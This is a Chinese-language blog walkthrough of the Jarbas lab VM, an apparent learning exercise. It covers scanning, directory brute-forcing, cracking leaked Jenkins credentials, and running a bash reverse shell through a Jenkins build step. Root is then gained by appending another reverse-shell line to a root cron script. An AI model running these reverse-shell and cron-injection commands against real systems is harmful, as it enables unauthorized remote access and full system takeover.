红队靶机之jarbas靶机复现,反弹sehll提权,用定时任务来提升至root用户

学习的视频是哔哩哔哩红队笔记:

「红队笔记」靶机精讲:JARBAS - Jenkins渗透原理详解,一个典型CMS渗透测试样本。_哔哩哔哩_bilibili

起手我们依旧先是扫描一手网段来下IP与端口的开放情况

nmap -Pn 扫描网段

发现靶机IP为192.168.38.134 开放了22,3306,80,8080我们可以进行的远程连接 找他web服务的漏洞,数据库如果能搜寻到泄露的信息也可以进行渗透,80端口有限级较高我们先测试他的web服务,在看下他的8080端口有个登录页面

我们可以看到他是一个jarbas网页但后续测试了以下网页上的交互功能并没有发现可利用点。

我先尝试以下几个常用的目录robots等,发现没有什么东西,那我们来进行目录爆破以下看看有没有收获,

用的还是gubuster dir -u http://192.168.38.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php

本来第一次扫描没有出东西,然后看了红队笔记老师的视频,发现后gubuster 有-x参数 可以添加html,php扫描的,发现了他的异常页面。

这里说我发现了他的登录凭证可以看到他是后面是大概率是一个md5加密需要我们去解密

看红队笔记老师用到了 hash-identifier来确认他是那种加密方式,和国外的网站来解密。

ok现在有他的登录凭证了,结合之前他那个的8080端口我们来进行登录,确认账号为:eder 密码为:vipsu

进去以后是一个jenkins的项目网站我们 new ltme创建一个项目

项目名随意就好

在这个项目页面中有很多功能我们将他们全部点开查看功能会,我们来用build中的shell来创建shell文件。

/bin/bash -i >& /dev/tcp/192.168.38.128/4444 0>&1

.

我们来建立一个反弹shell,让这段恶意代码跟着项目创建植入到服务器中

建立了反弹shell那我们就绪要在kali中开启监听.

我们用 nc -lvnp 4444,我们点bulid now点开项目让这个恶意项目启动,让恶意shell连上我们。

whoami来查看他的账号 uname -a看他系统,

在测试中的shell权限可能都很小,渗透测试中我们拿到的初始shell大部分可能是非交互型的shell可能会有一些异常的情况,我们只能想办法去获得一些别的账户

cat /etc/passwd 看他的用户文件

我们用cat /etc/crontab来查看他的一个定时任务,他有一个5分钟执行一次的脚本我们来查看他。

他是一个删除日志的脚本文件,他是root权限来执行的

我们来修改他的这个脚本让root用户来对我们发起shell连接

我们将我们的反弹shell只能写入他那个定时任务中

echo "/bin/bash -i >& /dev/tcp/192.168.38.128/4433 0>&1" >> /etc/script/CleaningScript.sh

然后再开一个终端启用监听等5分钟root权限会对我们发起连接

现在我们拿到了root用户

这个靶机也是拿下了,在这个靶机中我认为最重要的就是在提权步骤。

我们显示发现了他可植入的初始shell在渗透过程中发现了他的权限并不够那我们就要思维拓宽来看他的一些用户,进程,和启动项想办法移动到其它账号之中。

以后会经常更各种靶场教程,学习笔记和edusrc一些挖掘流程  本人学生也是低危时长两年半的渗透实习生。无法做到天天更新sorry。希望和大家一起进步

希望大家可以关注下我的公众号:安全的比奇堡

  • 26
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值